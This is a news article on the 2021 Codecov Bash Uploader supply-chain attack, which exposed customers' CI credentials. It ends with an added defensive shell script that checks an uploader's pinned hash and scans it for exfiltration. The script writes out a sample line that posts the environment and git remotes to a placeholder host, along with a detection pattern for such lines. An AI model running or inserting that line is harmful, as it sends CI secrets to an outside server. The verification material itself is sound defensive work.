Codecov, which provides code-coverage tooling used in continuous integration (CI) pipelines, has fallen victim to a supply-chain attack. The attacker was able to modify the company's software. The US government has launched an investigation.
In its announcement about the incident, Codecov says that on April 1, 2021, it discovered that someone had gained unauthorised access to its Bash Uploader script and had modified it. An error in Codecov's process for creating Docker images allowed the attacker to extract the credential required to modify the Bash Uploader script.
Codecov's investigation found that the attacker had been making periodic unauthorised modifications to the Bash Uploader script since 31 January 2021. The modified script could "potentially export information" stored in the CI environments of Codecov's roughly 29,000 customers to a third-party server outside Codecov's infrastructure. Because the Bash Uploader is also embedded in other Codecov uploaders, namely the uploader for GitHub Actions, the CircleCI Orb and the Bitrise Step, those uploaders were affected as well.
As a result, the attacker may have had access to any credentials, tokens or keys that users passed through their CI runners, and so to any other services reachable with those credentials. Information about the git remotes of the repositories the Bash Uploader was run against may also have been leaked.
Advice to users
Codecov users are advised to rotate all credentials, tokens and keys that were present in the environment variables of CI jobs that ran one of the affected uploaders, and to replace any stored copies of the Bash Uploader with the latest version, from which the malicious code has been removed. Codecov says it has also taken steps to limit the consequences of the incident as far as possible and to prevent a similar one in the future.
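As a concrete check to go with that advice, the following added example (not Codecov's own tooling) is a gate that a CI job can run before executing a downloaded uploader script. It pins the script's SHA-256 to a value taken from a copy you have reviewed, and separately scans the script for any line that feeds the output of env or git remote into curl or wget, which is the kind of behaviour described in this incident. The two sample scripts it builds are constructed stand-ins rather than the real Bash Uploader, the grep pattern is an assumption of this example, and 203.0.113.10 is a documentation address used only as a placeholder.

```shell
#!/bin/sh
# Added example, not Codecov's own tooling: gate a downloaded uploader script on
# (1) a SHA-256 pinned from a reviewed copy and (2) a scan for lines that ship
# the CI environment or git remotes to a network endpoint. The sample scripts
# below are constructed stand-ins, not the real Bash Uploader.
set -eu

# Print the SHA-256 of a file; works with coreutils (sha256sum) or macOS (shasum).
file_sha256() {
  { sha256sum "$1" 2>/dev/null || shasum -a 256 "$1"; } | awk '{print $1}'
}

# Return 0 if the file's hash equals the pinned value, 1 otherwise.
verify_pinned_sha256() {
  [ "$(file_sha256 "$1")" = "$2" ]
}

# Return 1 (printing the offending line to stderr) if a network client is fed
# the output of env/printenv or `git remote`; a legitimate uploader only posts
# the coverage report to its own API. The pattern is an assumption of this example.
scan_for_exfiltration() {
  if grep -nE '(curl|wget)[^#]*\$\((env|printenv|git remote)' "$1" >&2; then
    return 1
  fi
  return 0
}

# Combined gate: returns 0 when the script is safe to execute, 1 otherwise.
check_uploader() {
  verify_pinned_sha256 "$1" "$2" || { echo "hash mismatch: $1" >&2; return 1; }
  scan_for_exfiltration "$1" || { echo "exfiltration pattern in: $1" >&2; return 1; }
}

# Constructed clean stand-in: posts a coverage report and nothing else.
make_clean_sample() {
  cat > "$1" <<'EOF'
#!/usr/bin/env bash
VERSION="1.0.0"
report="coverage.xml"
curl -X POST --data-binary @"$report" "https://codecov.io/upload/v4?token=$CODECOV_TOKEN"
EOF
}

# Same stand-in with an injected line of the kind described in the article:
# it dumps the git remotes and the whole environment to an outside host
# (203.0.113.10 is a documentation address, used here as a placeholder).
make_tampered_sample() {
  make_clean_sample "$1"
  printf '%s\n' 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://203.0.113.10/upload' >> "$1"
}

# Stand-alone demo: pin the clean copy, then gate both copies against it.
demo() {
  dir="$(mktemp -d)"
  make_clean_sample "$dir/codecov"
  make_tampered_sample "$dir/codecov.tampered"
  pinned="$(file_sha256 "$dir/codecov")"
  check_uploader "$dir/codecov" "$pinned" && echo "codecov: OK, safe to run"
  check_uploader "$dir/codecov.tampered" "$pinned" || echo "codecov.tampered: rejected (hash)"
  # If the pinned hash had been fetched over the same compromised channel as
  # the script, it would match the tampered copy; the content scan still rejects it.
  check_uploader "$dir/codecov.tampered" "$(file_sha256 "$dir/codecov.tampered")" \
    || echo "codecov.tampered with matching hash: rejected (scan)"
  rm -rf "$dir"
}

demo
```

Take the pinned hash from a copy you have actually read, not from a checksum file downloaded alongside the script: a checksum served from the same compromised channel will simply match the tampered file, which is why the demo keeps the content scan as a second, independent check.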
Possibly similar to SolarWinds attack
The incident may have consequences similar to those of the SolarWinds attack. There, attackers inserted a backdoor into SolarWinds' software, giving them access to the networks of organisations that installed the trojanised update. In Codecov's case the attacker likewise gained a foothold in the vendor's build and distribution pipeline and was able to keep modifying the uploader unnoticed for roughly two months.
The US government is now also involved in the case, as Reuters has confirmed, although details of the investigation are not known. Atlassian says it has started its own investigation but has so far found no signs of compromise. Reuters also contacted P&G, GoDaddy and The Post but received no immediate response.